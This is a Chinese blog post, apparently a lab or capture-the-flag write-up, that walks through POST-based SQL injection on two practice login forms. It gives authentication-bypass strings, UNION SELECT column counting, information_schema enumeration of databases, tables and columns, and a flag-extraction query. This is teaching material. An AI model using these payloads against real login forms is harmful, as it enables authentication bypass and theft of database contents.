SQL注入——POST类型

最新推荐文章于 2024-06-18 13:50:50 发布
最新推荐文章于 2024-06-18 13:50:50 发布
阅读量1.9k 收藏 4
点赞数 3
分类专栏: 网络安全 文章标签: 黑盒测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/106073519
版权

SQL注入——POST类型

靶场地址
原理:
POST注入就是利用post传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息

第一题:

我们首先查看源码
在这里插入图片描述它直接去运行了代码,没有做任何的处理,因此,我们只需要闭合username的前面的代码,再把后面代码注释掉就可以实现数据交互

我在账号框框里输入

' or 1=1 #

在这里插入图片描述在这里插入图片描述
直接显示
在这里插入图片描述于是,我先来判断字段数
依次输入代码

'union select 1#

'union select 1,2#

'union select 1,2,3#

发现只有第三个才显示登陆成功
在这里插入图片描述于是,判断字段数有3个

接着,我们用database()查询数据库名:输入代码
同样依次输入

'union select 1,2,database() limit 0,1 #


'union select 1,2,database() limit 9,1 #

在这里插入图片描述error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar

查询到数据库,post_error,判断flag可能在这里面

于是继续输入代码

'union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

在这里插入图片描述找到flag

继续查表名:
输入代码

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 1,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 2,1 #

在这里插入图片描述发现它有两个列名:
flag
id
于是找到flag、
直接查询flag数据
输入代码

' union select 1,2,group_concat(flag) from flag#

在这里插入图片描述于是得到flag

第二题

方法相同,但是它的源代码不同
在这里插入图片描述我们需要用

”) or 1=1 #

在这里插入图片描述登陆成功,有post注入漏洞
于是,我先来判断字段数
依次输入代码

") union select 1#

")union select 1,2#

") union select 1,2,3#

判断字段数有3个
接着,我们用database()查询数据库名:输入代码
同样依次输入

")union select 1,2,database() limit 0,1 #


")union select 1,2,database() limit 9,1 #

在这里插入图片描述error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
查询到数据库,post_error,判断flag可能在这里面

于是继续输入代码

") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

发现它有两个列名:
flag
id
于是找到flag、
直接查询flag数据
输入代码

") union select 1,2,group_concat(flag) from flag#

于是得到flag
第二题完

猫鼠信安
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入漏洞全接触——高级篇.txt
02-13
4.用Get方法注入时,IIS会记录你所有的提交字符串,对Post方法做则不记录,所以能用Post的网址尽量不用Get。 5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,...
SQL注入大餐必备餐具SQLMA
11-06
### SQL注入大餐必备餐具——SQLMA #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来操纵后端数据库,进而获取敏感信息或控制数据库。为了有效地进行SQL...
sql 注入的类型post 基于错误的注入(sqllib靶场less-11-12)(通过burpusite分析)
weixin_74182283的博客
03-30 1249
post注入和get注入一样,都是基于数据库没有对语句进行足够多的过滤,导致用户可以直接在url上执行sql语句。这两基本上没区别,但是基于post的注入在真实情况下会比get的多得多,最典post注入就是万能密码。
SQL注入分类,一看你就明白了。SQL注入点_SQL注入类型_SQL注入有几种_SQL注入点分类
liuhyusb的博客
06-18 750
根据输入的 「参数」类型,可以将SQL注入分为两大类: 「数值」注入、 「字符」注入。
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注(SQL Blind Injection)是一种常见的网络安全漏洞,...同时,这也提醒了系统管理员,对于SQL注入防护的重要性,应加强输入验证,避免敏感信息的泄露。
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
* SQL盲注:是一种类型SQL注入攻击,攻击者可以通过猜测数据库名和其他敏感信息来获取访问权限。 * 手工注入:是一种类型SQL注入攻击,攻击者可以通过手动输入恶意数据来获取访问权限。 * BurpSuite:是一个Web...
SQL防注入
08-08
软件通过拦截HTTP请求中的GET和POST参数,检查其中是否存在已知的SQL注入关键词,如`and`、`exec`、`insert`等。一旦检测到恶意请求,系统将阻止其执行,从而避免了SQL注入攻击的发生。 #### 四、自定义SQL注入防护...
kechengsheji2021.zip
07-30
kechengsheji2021.zip
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
07-30
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
TwineCompile571GetItSetup.7z
07-30
JomiTech TwineCompile 是一款集成在 C++Builder IDE 中的插件,旨在通过多种技术显著减少 C++ 编译、构建和生成的时间。以下是 TwineCompile 的一些关键能力和特点: 集成编译优化:TwineCompile 通过多线程、文件缓存和自动后台编译等技术,直接集成到 C++Builder IDE 中,优化编译过程。 编译器封装:它不是 C++ 编译器,而是将 Embarcadero 经典和 CLANG 编译器封装在一个构建系统中,优化文件和项目的构建方式。 IDE 支持:TwineCompile 通过 GetIt 包管理器提供,支持安装它的 IDE。对于旧版 IDE 或没有活跃更新订阅的 IDE,可以购买许可证以获得支持。 版本兼容性:TwineCompile 5.x 支持 C++Builder 10.2 至 C++Builder 12.0,而 TwineCompile 4.x 支持 C++Builder 5 至 C++Builder 10.1。
SCI一区】淘金算法GRO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5642.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
植物大战僵尸纯js版本
07-30
用本地资源编写的css+js+html纯手撸版植物大战僵尸,使用vs code即可运行,不需要其他插件,快来下载试试吧(支持自定义阳光,僵尸刷新出现时间),支持自定义全部,有其他想法欢迎来私信共同探讨
【JCR一区级】鲸鱼算法WOA-CNN-LSTM-Attention故障诊断分类预测【含Matlab源码 5684期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
2024黑龙江省河流水系矢量图层shp数据最新版下载-带python代码
07-30
2024黑龙江省河流水系矢量图层shp数据下载-包含水系线和水系面数据,几千上万条数据,非常细化,附带shp转geojson的python代码
开题报告 海口市电影购票APP的设计与实现【答辩高分内容】.docx
07-30
开题报告有相应的毕业设计源码和数据库参考,需要可以绿泡泡 sheji288 (备注CSDN开题) 随着社会经济文化水平的提高,我们现在生活在一个快节奏的社会环境下,偶尔想放松和朋友或者恋人去观看一场让人心情愉悦的电影,亦或是自己在繁杂劳累的学习工作中想要进行放松。就会想要选择观看一场电影。我国在娱乐文化版块的发展也越来越迅速,大量的电影投入市场,所以观众的选择量也大大增加,很难从众多的电影中找到自己想要看的高分电影,从而进行选择和购买电影票。 针对这种社会需求现状,为了满足用户的购票需求,利用本科所学知识,例如:APP开发软件H5+,前端技术(html+css+javascript、Vue等),后端技术(JAVA语言以及Spingboot框架)、MySQL数据库。以网络服务器和手机端开发一款海口市电影购票APP。来提供给用户查看电影简介,寻找高分电影等,从而按照自己的需求进行购票。
【JCR一区级】矮猫鼬算法DMOA-CNN-LSTM-Attention故障诊断分类预测【含源码 5657期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
校园表白墙网站源码/表白网站源码/表白网页制作html-表白网站制作
07-30
校园表白墙网站源码/表白网站源码/表白网页制作html_表白网站制作 效果演示:biaobai1-www.diyiyuanma.cn 安装很简单, a、直接上传到要目录 并解压 b、绑定 解析好域名 c、安装完成! 后台/admin 账号密码都是diyiyuanma.cn 新年送女友个惊喜吧 无数据库上传就能用 校园表白墙网站源码/表白网站源码/表白网页制作html_表白网站制作
【JCR一区级】减法平均算法SABO-CNN-LSTM-Attention故障诊断分类预测【含源码 5681期】.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-LSTM-Attention分类系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-LSTM-Attention分类 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-LSTM-Attention分类 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-LSTM-Attention分类 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-LSTM-Attention分类 4.4.5 萤火虫算法FA/差分算法DE-CNN-LSTM-Attention分类
apache-activemq-5.16.7-bin.zip
最新发布
07-30
apache-activemq-5.16.7-bin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值